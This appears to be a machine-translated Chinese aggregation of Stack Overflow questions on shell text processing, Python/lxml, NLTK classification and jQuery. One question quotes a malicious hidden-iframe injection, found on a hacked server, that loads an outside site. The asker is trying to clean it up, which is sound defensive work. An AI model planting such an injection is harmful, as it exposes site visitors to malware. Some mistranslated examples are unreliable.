我的任务是找到一种方法将大量的.docx文件转换为docbook 5.目前,我们在openoffice中打开文件并保存到docbook.这是一项耗时的任务,但我相信有更好的方法.然后,这些文件将进一步处理到我们的自定义Relax NG模式.因此,这种转换不需要完美无缺.我环顾四周,并将继续调查一些线索,但没有找到任何有用的东西.
看看转换doc/docx到他们建议upCast的语义HTML,但这似乎不适合我的需求.
我正在寻找可以从命令行使用的免费软件.我最终想批量处理我们的文件.我已经包含了linux,python和java标签,这些是我最舒服的环境,但愿意为正确的解决方案而努力.在我出去重新发明轮子之前,我正在尝试做一些研究.
当我有一个utf-8编码的字符串时,我遇到了.isupper()的问题.我有很多文本文件,我正在转换为xml.虽然文本变化很大,但格式是静态的.所有大写字母应包含在<title>标签和其他所有内容中<p>.它比这复杂得多,但这对我的问题应该足够了.
我的问题是这是一个utf-8文件.这是必须的,因为最终输出中会有很多非英文字符.这可能是时候提供一个简短的例子:
inputText.txt
恢复
培根ipsum dolor坐在amet条牛排丁骨鸡,irure地面圆nostrud aute pancetta火腿飞刀incididunt aliqua.Dolore短腰前鸡,夹头鼓槌ut汉堡ut andouille.在labum eiusmod短腰,排骨enim球尖香肠.Tenderloin ut consequat侧翼.Tempor officia sirloin duis.在pancetta do,ut dolore t-bone sint pork pariatur dolore chicken exercitation.Nostrud ribeye tail,ut ullamco venison mollit pork chop proident consectetur fugiat reprehenderit officia ut tri-tip.
DesiredOutput
<title>RÉSUMÉ</title>
<p>Bacon ipsum dolor sit amet strip steak t-bone chicken, irure ground round nostrud
aute pancetta ham hock incididunt aliqua. Dolore short loin ex chicken, chuck drumstick
ut hamburger ut andouille. In laborum eiusmod …Run Code Online (Sandbox Code Playgroud) 我有一个人类标记的语料库,包含超过5000个主题索引文档的XML.它们的大小从几百千字节到几百兆字节不等.作为手稿的短篇文章.它们都被编入了与段落级别一样深的索引.我很幸运有这样的语料库,我正在尝试自学一些NLP概念.不可否认,我才开始.到目前为止只阅读免费提供的NLTK书籍,streamhacker和略读jacobs(?)NLTK cookbook.我喜欢尝试一些想法.
有人建议,也许,我可以采用双字节并使用朴素的贝叶斯分类来标记新文档.我觉得这是错误的做法.Naive Bayes精通真假关系,但要在我的分层标签集上使用它,我需要为每个标签构建一个新的分类器.其中近1000个.我有内存和处理器能力来承担这样的任务,但我对结果持怀疑态度.但是,我将首先尝试这种方法,以安抚某人的请求.我可能会在接下来的一两天内完成这项任务,但我预测其准确性会很低.
所以我的问题有点开放.由于该学科的性质以及我的数据的一般不可靠性,很可能很难给出确切的答案.
什么样的分类器适合这项任务.我错了,贝叶斯可以用于多种真/假操作.
我应该为这样的任务追求什么特征提取.我并不期待这些双桅帆船.
每个文件还包含一些引用信息,包括作者,作者性别m,f,混合(m&f)和其他(Gov't inst等),文档类型,发布日期(当前16分) ,人类分析师,以及其他一些一般要素.我还要感谢一些有用的描述性任务,以帮助更好地研究性别偏见,分析师偏见等数据.但是要意识到这有点超出了这个问题的范围.
2011年6月30日 - 由于他的回答,我正在为这个问题授予@Pablo .由于他的评论中讨论的原因,我仍然无法正确安装lxml 2.3.我收集了一些我可以做的工作,但我已经在这个问题上度过了一段荒谬的时间.但是,我已经编写了我需要的代码并成功安装了lxml 2.2.8.代码与此版本一起使用.更好的是,Pablo是唯一一个正确诊断错误的人.这是libxslt需要更新到支持的版本exsltMathXpathCtxtRegister我感谢每个人对这个问题的帮助.
2011年6月29日 - 更新此问题以反映意见并更好地记录我的尝试
我首先应该说我已经尝试了所有可能的解决方案并安装了可以想象的场景.是的,这个主题有类似的问题,但他们的具体问题和解决方案不是我自己的.我花了大约10-15个小时,我只是继续变得更加困惑.
我的主要关注点
总之,从源安装LXML-2.3后或与easy_install-2.7 lxml用于在centOs5.6 python2.7,交替安装python的,我不能正确地导入该模块.它将安装没有任何明显的错误,但它在尝试导入etree时返回以下错误:
Python 2.7.2 (default, Jun 16 2011, 11:53:48)
[GCC 4.1.2 20080704 (Red Hat 4.1.2-50)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import lxml
>>> from lxml import etree
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
ImportError: /usr/local/lib/python2.7/site-packages/lxml-2.3-py2.7-linux-x86_64.egg/lxml/etree.so: undefined symbol: exsltMathXpathCtxtRegister
Run Code Online (Sandbox Code Playgroud)
我试过了什么
我所遇到的最常见的两个建议是,以确保libxml2 && libxml2-dev与libxslt1 && libxslt1-dev他们.我已经通过yum安装了它们. …
我觉得我在这里忽略了一些非常简单的东西.我需要另一双眼睛.我花了很多时间在这上面,而不是我应该做的.
看看这个小提琴=> http://jsfiddle.net/R8SxU/
添加超过一年后,为什么不会更新图标?我希望最重要的一个是加号来象征着添加一个新的一年,而下面剩下的一个是减去要删除的.它适用于第一个,但只适用于第一个.我相信我有正确的选择器,因为每个按钮都能正确激活功能(控制台输出).
<div>
<label for="year-0">Enter Year</label>
<input id="year-0" type="number" title="Enter Year"/>
<button id="addYear" title="Add Year">Year</button>
</div>
Run Code Online (Sandbox Code Playgroud)
$('#addYear')
.button({icons: { primary: 'ui-icon-circle-plus' } })
.on('click', function() {
var clone = $('div').first().clone(true),
peroid = $('div').length;
//update ID
$(clone).find('label').prop('for','year-' + peroid);
$(clone).find('input').prop('id','year-' + peroid);
$('div:first button')
.prop('id','')
.attr('title','Remove Year')
.addClass('removeYear');
$(clone).insertBefore('div:first');
$('.removeYear:first')
.off('click')
.button({ icons: { primary: 'ui-icon-circle-minus' } }) // Why Wont This Work
.on('click', function() { console.log('remove function'); });
});
Run Code Online (Sandbox Code Playgroud) 我正在尝试创建一个应用程序,检查此特定应用程序是否正在运行,然后在指定的时间后终止应用程序.我打算拿到应用程序的pid.我如何获得应用程序的pid?
谢谢
我需要用grep修剪一些文本,我尝试过各种其他方法并且运气不好,所以例如:
C:\Users\Admin\Documents\report2011.docx: My Report 2011
C:\Users\Admin\Documents\newposter.docx: Dinner Party Poster 08
Run Code Online (Sandbox Code Playgroud)
如何修剪文本文件,以便修剪":"及其后的所有字符.
例如,输出如下:
C:\Users\Admin\Documents\report2011.docx
C:\Users\Admin\Documents\newposter.docx
Run Code Online (Sandbox Code Playgroud) 我有以下字符串作为示例:ex."放弃16 1.10 2.62 3.50"
我想把这个结果传递给sed并删除所有十进制数字给我留下以下内容:ex."被遗弃的16"
我使用以下命令:sed's/.// g'显然不起作用.
有人可以告诉我如何使用带有sed的通配符删除任何匹配" . "的内容.
谢谢
.slideDown工作正常.第二次单击链接时,会再次出现.slideDown动画而不是.slideUp.请帮我一把 谢谢.
$(document).ready(function() {
$('#toggleButton').click(function() {
if ($('#toggleSection').is(":hidden")) {
$('#toggleSection').slideDown("slow");
}
else {
$('#toggleSection').slideUp("slow");
}
return false;
});
});
Run Code Online (Sandbox Code Playgroud)
以下是整个模块的代码.这个php包含在主页面上,其中还包含页眉和页脚.
<?php
/*
Written by: Daniel Kassner
Website: http://www.danielkassner.com
Originally posted on: http://www.wlscripting.com
Date: 09-13-2007 and last updated: 05-21-2010
*/
if (!function_exists('format_phone_us')) {
function format_phone_us($phone = '', $convert = true, $trim = true)
{
// If we have not entered a phone number just return empty
if (empty($phone)) {
return false;
}
// Strip out any extra characters that we do …Run Code Online (Sandbox Code Playgroud) 我有一个目录树,每个目录都有png文件.
我想从每个目录中复制那些分辨率>(600x600)的png文件.
使用以下命令可以创建一个可以做到这一点的脚本,但它会相当长.
此命令将列出png的水平像素数> 600.
for f in *.png;do if [ `file $f | cut -f5 -d\ ` -gt 600 ] ; then echo $f;fi;done
Run Code Online (Sandbox Code Playgroud)
此命令将查找所有dirs并将file.png复制到它们
find <basedir>/ -type d -exec cp file.png '{}' \;
Run Code Online (Sandbox Code Playgroud)
有人知道解决这个问题的好方法吗?
更新:这就是我得到的.
for f in $(find . -type f -name *png -print0); do
identify -format '%w %h' $f|awk '{print $1 $2}'
# if [$1 -gt 600 && $2 -gt 600]; then
cp $f ~/600x600
fi
done
Run Code Online (Sandbox Code Playgroud)
我如何在-statement中使用$1和$2来自?awkif
问题:
我的网络服务器最近遭到入侵.他们针对javascript文件.他们插入了以下代码段
document.write('<iframe src="http://lcbmc.co.uk/showthread.php?t=31540750" width="1" height="1" frameborder="0"></iframe>')
Run Code Online (Sandbox Code Playgroud)
这被添加到服务器上每个.js文件的顶部.
解决方案:
编写一个脚本来打开我服务器上的每个javascript文件,检查恶意代码,删除恶意代码,最后保存文件.
问题:
脚本应该用什么编程语言编写?python会起作用吗?我在我的服务器上运行python 2.4.3.如果我在root下运行python脚本,我将不得不担心意外更改已修改文件的所有者权限?
谢谢
我想对我在awk中遇到的问题提供帮助或指导.
我有一个包含超过5个字段的制表符分隔文件.我想输出除前5个字段之外的字段.
你能告诉我如何写一个awk脚本来完成这个任务吗?
最好的,jianfeng.mao
请注意以下类型的评论:
我的文件中有很多字段.不同的行具有不同数量的字段.每行的字段数不是标准的.
有没有一种标准的方法来使用jquery-ui图标精灵而不将它们附加到按钮上?
它们很容易使用.例如,将类'ui-icon-circle-arrow-e'附加到任何展开的链接和'ui-icon-circle-arrow-s'处于展开状态.但这些感觉就像黑客一样,我是jquery(-ui)库的新手,我只想尝试建立一些最佳实践.我在这里和谷歌做了一些搜索没有真正明确的答案.
linux ×7
python ×5
awk ×3
bash ×3
jquery ×3
java ×2
sed ×2
unix ×2
centos ×1
css ×1
cut ×1
docbook ×1
gawk ×1
grep ×1
javascript ×1
jquery-ui ×1
kill ×1
lxml ×1
makefile ×1
ms-word ×1
nlp ×1
nltk ×1
perl ×1
php ×1
pid ×1
scripting ×1
slidedown ×1
slideup ×1
statistics ×1
ubuntu ×1
unicode ×1
utf-8 ×1
wildcard ×1